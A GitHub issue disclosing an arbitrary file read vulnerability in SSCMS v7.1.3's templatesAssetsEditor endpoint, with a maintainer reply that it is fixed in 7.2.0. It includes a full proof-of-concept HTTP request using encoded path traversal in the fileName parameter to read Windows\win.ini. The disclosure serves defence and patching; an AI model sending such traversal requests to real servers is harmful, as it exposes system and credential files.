Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

background file reading #3491

Open
nolan124 opened this issue Oct 24, 2022 · 2 comments
Open

background file reading #3491

nolan124 opened this issue Oct 24, 2022 · 2 comments

Comments

@nolan124
Copy link

Vulnerability conditions
SSCMS v7.1.3 +mysql+administrator privileges
Vulnerability details

  1. Code analysis found /api/admin/cms/templates/templatesAssetsEditor?directoryPath=&fileName=
    An arbitrary file read vulnerability exists in the interface
    code analysis process
    \SSCMS.Web\Controllers\Admin\Cms\Templates\TemplatesAssetsEditorController.Get.cs
    Enter and find that the FileName parameter is controllable and there is no filtering to pass into the ReadTextAsync method

image

The entry method discovery is to read out the cultural content, resulting in a file read vulnerability.
image

Vulnerability verification
An exp packet occurs after logging in to the background to obtain administrator credentials
GET /api/admin/cms/templates/templatesAssetsEditor?directoryPath=&fileName=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini&fileType=html&siteId=1 HTTP/1.1 Host: 192.168.3.129 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.9 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MDY1NDYwLCJleHAiOjE2NjYxNTE4NjAsImlhdCI6MTY2NjA2NTQ2MH0.C_5BVy0Tlv-s9n8Nq2zgummkzvn50prSoOefuRVhBR8 Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I Referer: http://192.168.3.129/ss-admin/cms/templatesAssetsEditor/?siteId=1&directoryPath=&fileName=&fileType=html&tabName=dd25719b-c34e-40df-883f-6a991a23d826 Accept-Encoding: gzip
image

@starlying
Copy link
Contributor

Fixed at 7.2.0, Thanks

@nolan124
Copy link
Author

find by Chaitin Security Research Lab

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants